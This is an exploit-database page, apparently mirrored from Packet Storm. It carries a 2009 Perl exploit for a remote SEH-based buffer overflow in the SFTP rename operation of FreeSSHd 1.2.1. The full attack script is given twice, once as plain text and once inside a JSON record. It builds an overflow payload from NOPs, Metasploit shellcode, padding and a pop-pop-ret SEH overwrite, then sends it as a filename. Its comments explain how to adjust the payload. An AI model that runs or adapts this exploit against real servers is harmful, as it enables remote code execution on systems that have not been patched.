Search...

FreeSSHd 1.2.1 Remote Buffer Overflow Exploit

2009-03-27T00:00:00

ID PACKETSTORM:76112
Type packetstorm
Reporter r0ut3r
Modified 2009-03-27T00:00:00

Description

                                        
                                            `# FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit  
#  
# Advisory: http://www.bmgsec.com.au/advisory/45/  
# Original: http://www.bmgsec.com.au/advisory/32/  
# Related : http://www.bmgsec.com.au/advisory/42/  
#  
# Test box: WinXP Pro SP2 English  
#  
# Exploit code for a vulnerability I discovered sometime  
# ago in FreeSSHd 1.2.1. This code should be run from a   
# user titled "root", or adjust the payload for your   
# username. I've left space for adjustments. Up to the  
# first six NOPs can be used (inclusive).   
#  
# The code exploits a vulnerability in the SFTP Rename  
# operation. The vulnerability was patched in 1.2.2  
#  
# 00416F98 50 PUSH EAX   
# 00416F99 8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148]  
# 00416F9F 50 PUSH EAX   
# 00416FA0 E8 45B50400 CALL &lt;JMP.&MSVCRT.strcpy&gt;   
#  
#  
# Written and discovered by:  
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)  
  
use Net::SSH2;  
  
my $user = "root";  
my $pass = "yahh";  
  
my $ip = "127.0.0.1";  
my $port = 22;  
  
my $ssh2 = Net::SSH2-&gt;new();  
  
print "[+] Connecting...\n";  
$ssh2-&gt;connect($ip, $port) || die "[-] Unable to connect!\n";  
$ssh2-&gt;auth_password($user, $pass) || "[-] Incorrect credentials\n";  
print "[+] Sending payload\n";  
  
$nop = "\x90";  
$padding = 'A' x 105;  
  
my $SEH = "\x21\x11\x40\x00"; # pop, pop, ret - 0x00401121 (Universal - freeSSHdServer.exe)  
my $nextSEH = "\xEB\xF0\x90\x90"; # jmp short 240, nop, nop  
  
$mShellcode = "\xE9\xF2\xFE\xFF\xFF";  
  
# win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub - metasploit.com  
my $shellcode =  
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02".  
"\x28\x29\x10\x83\xeb\xfc\xe2\xf4\xfe\xc0\x6d\x10\x02\x28\xa2\x55".  
"\x3e\xa3\x55\x15\x7a\x29\xc6\x9b\x4d\x30\xa2\x4f\x22\x29\xc2\x59".  
"\x89\x1c\xa2\x11\xec\x19\xe9\x89\xae\xac\xe9\x64\x05\xe9\xe3\x1d".  
"\x03\xea\xc2\xe4\x39\x7c\x0d\x14\x77\xcd\xa2\x4f\x26\x29\xc2\x76".  
"\x89\x24\x62\x9b\x5d\x34\x28\xfb\x89\x34\xa2\x11\xe9\xa1\x75\x34".  
"\x06\xeb\x18\xd0\x66\xa3\x69\x20\x87\xe8\x51\x1c\x89\x68\x25\x9b".  
"\x72\x34\x84\x9b\x6a\x20\xc2\x19\x89\xa8\x99\x10\x02\x28\xa2\x78".  
"\x3e\x77\x18\xe6\x62\x7e\xa0\xe8\x81\xe8\x52\x40\x6a\x56\xf1\xf2".  
"\x71\x40\xb1\xee\x88\x26\x7e\xef\xe5\x4b\x48\x7c\x61\x28\x29\x10";  
  
my $payload = $nop x 6 . $shellcode . $padding . $mShellcode . $nop x 9 . $nextSEH . $SEH;  
  
my $sftp = $ssh2-&gt;sftp();  
$sftp-&gt;rename($payload, 'B');  
  
print "[+] Sent";  
$ssh2-&gt;disconnect;  
  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:76112", "type": "packetstorm", "bulletinFamily": "exploit", "title": "FreeSSHd 1.2.1 Remote Buffer Overflow Exploit", "description": "", "published": "2009-03-27T00:00:00", "modified": "2009-03-27T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/76112/FreeSSHd-1.2.1-Remote-Buffer-Overflow-Exploit.html", "reporter": "r0ut3r", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:32", "viewCount": 1, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2016-11-03T10:22:32", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:32", "rev": 2}, "vulnersScore": 0.5}, "sourceHref": "https://packetstormsecurity.com/files/download/76112/freesshdseh-overflow.txt", "sourceData": "`# FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit \n# \n# Advisory: http://www.bmgsec.com.au/advisory/45/ \n# Original: http://www.bmgsec.com.au/advisory/32/ \n# Related : http://www.bmgsec.com.au/advisory/42/ \n# \n# Test box: WinXP Pro SP2 English \n# \n# Exploit code for a vulnerability I discovered sometime \n# ago in FreeSSHd 1.2.1. This code should be run from a \n# user titled \"root\", or adjust the payload for your \n# username. I've left space for adjustments. Up to the \n# first six NOPs can be used (inclusive). \n# \n# The code exploits a vulnerability in the SFTP Rename \n# operation. The vulnerability was patched in 1.2.2 \n# \n# 00416F98 50 PUSH EAX \n# 00416F99 8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148] \n# 00416F9F 50 PUSH EAX \n# 00416FA0 E8 45B50400 CALL <JMP.&MSVCRT.strcpy> \n# \n# \n# Written and discovered by: \n# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) \n \nuse Net::SSH2; \n \nmy $user = \"root\"; \nmy $pass = \"yahh\"; \n \nmy $ip = \"127.0.0.1\"; \nmy $port = 22; \n \nmy $ssh2 = Net::SSH2->new(); \n \nprint \"[+] Connecting...\\n\"; \n$ssh2->connect($ip, $port) || die \"[-] Unable to connect!\\n\"; \n$ssh2->auth_password($user, $pass) || \"[-] Incorrect credentials\\n\"; \nprint \"[+] Sending payload\\n\"; \n \n$nop = \"\\x90\"; \n$padding = 'A' x 105; \n \nmy $SEH = \"\\x21\\x11\\x40\\x00\"; # pop, pop, ret - 0x00401121 (Universal - freeSSHdServer.exe) \nmy $nextSEH = \"\\xEB\\xF0\\x90\\x90\"; # jmp short 240, nop, nop \n \n$mShellcode = \"\\xE9\\xF2\\xFE\\xFF\\xFF\"; \n \n# win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub - metasploit.com \nmy $shellcode = \n\"\\x29\\xc9\\x83\\xe9\\xde\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x02\". \n\"\\x28\\x29\\x10\\x83\\xeb\\xfc\\xe2\\xf4\\xfe\\xc0\\x6d\\x10\\x02\\x28\\xa2\\x55\". \n\"\\x3e\\xa3\\x55\\x15\\x7a\\x29\\xc6\\x9b\\x4d\\x30\\xa2\\x4f\\x22\\x29\\xc2\\x59\". \n\"\\x89\\x1c\\xa2\\x11\\xec\\x19\\xe9\\x89\\xae\\xac\\xe9\\x64\\x05\\xe9\\xe3\\x1d\". \n\"\\x03\\xea\\xc2\\xe4\\x39\\x7c\\x0d\\x14\\x77\\xcd\\xa2\\x4f\\x26\\x29\\xc2\\x76\". \n\"\\x89\\x24\\x62\\x9b\\x5d\\x34\\x28\\xfb\\x89\\x34\\xa2\\x11\\xe9\\xa1\\x75\\x34\". \n\"\\x06\\xeb\\x18\\xd0\\x66\\xa3\\x69\\x20\\x87\\xe8\\x51\\x1c\\x89\\x68\\x25\\x9b\". \n\"\\x72\\x34\\x84\\x9b\\x6a\\x20\\xc2\\x19\\x89\\xa8\\x99\\x10\\x02\\x28\\xa2\\x78\". \n\"\\x3e\\x77\\x18\\xe6\\x62\\x7e\\xa0\\xe8\\x81\\xe8\\x52\\x40\\x6a\\x56\\xf1\\xf2\". \n\"\\x71\\x40\\xb1\\xee\\x88\\x26\\x7e\\xef\\xe5\\x4b\\x48\\x7c\\x61\\x28\\x29\\x10\"; \n \nmy $payload = $nop x 6 . $shellcode . $padding . $mShellcode . $nop x 9 . $nextSEH . $SEH; \n \nmy $sftp = $ssh2->sftp(); \n$sftp->rename($payload, 'B'); \n \nprint \"[+] Sent\"; \n$ssh2->disconnect; \n \n \n`\n", "immutableFields": []}